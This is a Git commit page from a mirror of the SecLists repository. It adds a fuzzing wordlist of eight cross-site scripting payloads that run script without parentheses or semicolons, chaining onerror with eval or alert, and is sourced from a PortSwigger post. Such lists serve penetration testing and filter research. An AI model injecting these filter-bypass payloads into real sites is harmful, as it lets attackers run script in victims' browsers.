sync/SecLists
1
0
Fork 0
mirror of https://github.com/danielmiessler/SecLists.git synced 2025-07-18 09:49:26 -04:00
Code Issues Projects Releases Packages Wiki Activity Actions 3

Merge pull request #304 from g0tmi1k/xss

Browse source 
Add XSS without parentheses and semi-colons

Source: https://portswigger.net/blog/xss-without-parentheses-and-semi-colons
This commit is contained in:
g0tmi1k 2019-05-22 12:18:18 +01:00 committed by GitHub
commit 28db64c6e2
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
1 changed files with 8 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

8
Fuzzing/XSS/xss-without-parentheses-semi-colons-portswigger.txt Normal file
View file

@ -0,0 +1,8 @@
<script>onerror=alert;throw 1337</script>
<script>{onerror=alert}throw 1337</script>
<script>throw onerror=alert,'some string',123,'haha'</script>
<script>{onerror=eval}throw'=alert\x281337\x29'</script>
<script>{onerror=eval}throw{lineNumber:1,columnNumber:1,fileName:1,message:'alert\x281\x29'}</script>
<script>{onerror=prompt}throw{lineNumber:1,columnNumber:1,fileName:'second argument',message:'first argument'}</script>
<script>throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]+a[13]</script>
<script>TypeError.prototype.name ='=/',0[onerror=eval]['/-alert(1)//']</script>